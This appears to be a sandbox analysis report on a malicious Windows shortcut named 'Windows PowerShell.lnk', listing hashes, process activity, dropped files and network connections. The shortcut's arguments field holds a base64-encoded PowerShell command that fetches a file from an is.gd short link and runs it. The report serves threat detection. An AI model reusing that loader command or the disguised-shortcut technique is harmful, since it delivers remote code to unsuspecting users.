| Field | Value |
|---|---|
| File name | Windows PowerShell.lnk |
| Full analysis | https://app.any.run/tasks/666e0cce-b438-484d-9f40-58033ceb81e6 |
| Verdict | Malicious activity |
| Analysis date | October 30, 2024 at 13:02:37 |
| OS | Windows 10 Professional (build: 19045, 64 bit) |
| Indicators | |
| MIME | application/x-ms-shortcut |
| File info | MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Unicoded, MachineID windows11, EnableTargetMetadata KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Fri Feb 16 21:44:00 2024, atime=Thu Oct 3 09:53:00 2024, mtime=Fri Feb 16 21:44:00 2024, length=450560, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" |
| MD5 | 02E1F1EA7DC301147433623D31E5A294 |
| SHA1 | B882F489808747B6201B113D306A42D533CA229E |
| SHA256 | DE6D56AE01166232F2CB403C86D2DDF59D7654510100971FCD0FE59A3A8E9944 |
| SSDEEP | 48:8FfT0u6AZyNswxtGTLqHLjOQIBJBSRC3+GU:8FfT0IyNhMLqHzIT5+G |

| Extension | Detected type |
|---|---|
| .lnk | Windows Shortcut (100) |

| Field | Value |
|---|---|
| Flags | IDList, LinkInfo, RelativePath, WorkingDir, CommandArgs, Unicode, TargetMetadata |
| FileAttributes | Archive |
| CreateDate | 2024:02:16 21:44:00+00:00 |
| AccessDate | 2024:10:03 09:53:00+00:00 |
| ModifyDate | 2024:02:16 21:44:00+00:00 |
| TargetFileSize | 450560 |
| IconIndex | (none) |
| RunWindow | Show Minimized No Activate |
| HotKey | (none) |
| TargetFileDOSName | powershell.exe |
| DriveType | Fixed Disk |
| DriveSerialNumber | 7CEA-241E |
| VolumeLabel | - |
| LocalBasePath | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| RelativePath | ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| WorkingDirectory | C:\Windows\system32 |
| CommandLineArguments | -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA= |
| MachineID | windows11 |

| PID | CMD | Path | Indicators | Parent process | User | Company | Integrity level | Description | Exit code | Version |
|---|---|---|---|---|---|---|---|---|---|---|
| 696 | cmd /c exit 86 | C:\Windows\System32\cmd.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 86 | 10.0.19041.1 (WinBuild.160101.0800) |
| 860 | cmd /c exit 110 | C:\Windows\System32\cmd.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 110 | 10.0.19041.1 (WinBuild.160101.0800) |
| 860 | cmd /c exit 46 | C:\Windows\System32\cmd.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 46 | 10.0.19041.1 (WinBuild.160101.0800) |
| 944 | cmd /c exit 89 | C:\Windows\System32\cmd.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 89 | 10.0.19041.1 (WinBuild.160101.0800) |
| 944 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESEE31.tmp" "c:\Users\admin\AppData\Local\Temp\CSC6ADC1DC896B34852886CC2A4CF5F2E6C.TMP" | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | — | csc.exe | admin | Microsoft Corporation | MEDIUM | Microsoft® Resource File To COFF Object Conversion Utility | 0 | 14.32.31326.0 |
| 1204 | cmd /c exit 57 | C:\Windows\System32\cmd.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 57 | 10.0.19041.1 (WinBuild.160101.0800) |
| 1428 | cmd /c exit 121 | C:\Windows\System32\cmd.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 121 | 10.0.19041.1 (WinBuild.160101.0800) |
| 1452 | "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\e1xmrxit.cmdline" | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | | powershell.exe | admin | Microsoft Corporation | MEDIUM | Visual C# Command Line Compiler | 0 | 4.8.9037.0 built by: NET481REL1 |
| 1572 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\.cmd"" | C:\Windows\System32\cmd.exe | — | powershell.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 10.0.19041.1 (WinBuild.160101.0800) |
| 1752 | cmd /c exit 114 | C:\Windows\System32\cmd.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 114 | 10.0.19041.1 (WinBuild.160101.0800) |

| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 5516 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8FD5CTIJH0MTV6XXAX2L.temp | binary | 07EE9A6A8413CBDDA59734DF3316994D | 3E90456FBAEF1FD7FF85119876D796064B12F3309E137280B39497F605330E14 |
| 5516 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF8c24f.TMP | binary | D040F64E9E7A2BB91ABCA5613424598E | D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670 |
| 5516 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary | 07EE9A6A8413CBDDA59734DF3316994D | 3E90456FBAEF1FD7FF85119876D796064B12F3309E137280B39497F605330E14 |
| 5516 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_j4ups22e.bcj.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 5516 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kn5nfhsm.yr2.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 5516 | powershell.exe | C:\Users\admin\AppData\Local\Temp\.cmd | text | A07FCB39B340AD8DEA993A5F5C4D9064 | EEB86BDD38DC4FA93046F3CC0E443018518B81828D34E5D1E75F3BD9AAB0F8A7 |
| 2076 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zquxmdfi.rqv.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 2076 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kh2qbkrc.ufn.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 2076 | powershell.exe | C:\Users\admin\AppData\Local\Temp\e1xmrxit.0.cs | text | 2C592480A51FF7A7D45E4233EF0D7AEE | 6A7DE1714F4980AFD5CD7BCF889AC569AB62424367BBD3933826CF79BFC22136 |
| 2076 | powershell.exe | C:\Users\admin\AppData\Local\Temp\e1xmrxit.cmdline | text | 03548FA05C0CD3999D930348A6AA87FA | 68B88F4BCDEB62F9AE897E1A173F373B21DE91A598F2E377865F1224487E0EBD |

| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3916 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
5516 | powershell.exe | GET | 301 | 104.25.234.53:80 | http://is.gd/jwr7JD | unknown | — | — | shared |
4360 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
5616 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
5616 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
6720 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | — | — | whitelisted |

| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 2.23.209.143:443 | th.bing.com | Akamai International B.V. | GB | whitelisted |
4020 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
3916 | svchost.exe | 20.190.159.0:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3916 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
5516 | powershell.exe | 104.25.234.53:80 | is.gd | CLOUDFLARENET | US | shared |
5516 | powershell.exe | 104.25.234.53:443 | is.gd | CLOUDFLARENET | US | shared |
5516 | powershell.exe | 140.82.121.4:443 | github.com | GITHUB | US | shared |
5516 | powershell.exe | 185.199.110.133:443 | objects.githubusercontent.com | FASTLY | US | shared |

| Domain | IP | Reputation |
|---|---|---|
| login.live.com | | whitelisted |
| ocsp.digicert.com | | whitelisted |
| is.gd | | shared |
| github.com | | shared |
| objects.githubusercontent.com | | shared |
| go.microsoft.com | | whitelisted |
| th.bing.com | | whitelisted |
| settings-win.data.microsoft.com | | whitelisted |
| slscr.update.microsoft.com | | whitelisted |
| www.microsoft.com | | whitelisted |

| PID | Process | Class | Message |
|---|---|---|---|
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Misc activity | ET INFO URL Shortener Service Domain in DNS Lookup (is .gd) |